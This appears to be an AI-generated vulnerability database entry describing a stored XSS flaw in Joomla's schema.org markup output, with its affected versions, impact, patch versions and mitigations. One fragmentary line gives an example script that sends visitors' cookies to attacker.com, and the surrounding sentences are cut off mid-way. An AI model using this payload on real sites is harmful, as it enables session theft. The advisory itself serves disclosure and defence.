
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-73336 is a Cross-Site Scripting (XSS) vulnerability in Joomla! CMS core, identified as security advisory [20260806], affecting versions 5.1.0–5.4.7 and 6.0.0–6.1.2. The flaw stems from improper escaping of flags in schema.org structured data markup outputs, enabling injection of malicious scripts. It was published on August 18, 2026, with a patch made available the same day. The vulnerability carries a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory, Joomla Security Centre).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically arising from insufficient output escaping when rendering schema.org structured data markup in Joomla's core (GitHub Advisory). An attacker with high privileges (e.g., an administrator or editor-level account) can inject arbitrary JavaScript into schema.org markup fields, which is then rendered unsanitized in page output and executed in the browsers of site visitors. The attack vector is network-based, requires no user interaction from the attacker, and has low attack complexity, though it does require elevated privileges to inject the malicious content (Joomla Security Centre).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users visiting affected Joomla pages, enabling session cookie theft, account hijacking, page content defacement, and actions performed on behalf of victims without their knowledge. The confidentiality and integrity of the vulnerable system are both assessed as low-impact, with no availability impact and no impact on subsequent systems (GitHub Advisory). While the scope is limited to the vulnerable system, session hijacking could facilitate privilege escalation or further compromise of the Joomla backend.
As of the disclosure date, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (Joomla Security Centre). The EPSS score is 0.0, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires high privileges, which further limits the attack surface compared to unauthenticated XSS vulnerabilities.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a schema.org-related field, exploiting the improper output escaping.<script> tags or encoded JavaScript within schema.org markup blocks.Joomla has released patched versions addressing this vulnerability: upgrade to Joomla 5.4.8 or later (for the 5.x branch) or 6.1.3 or later (for the 6.x branch) (Joomla Security Centre). As an additional layer of defense, administrators should implement Content Security Policy (CSP) HTTP headers to restrict script execution sources. Custom schema.org implementations should be reviewed and validated to ensure proper output escaping is applied. Restricting high-privilege account access and enabling multi-factor authentication can reduce the risk of exploitation via compromised credentials.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."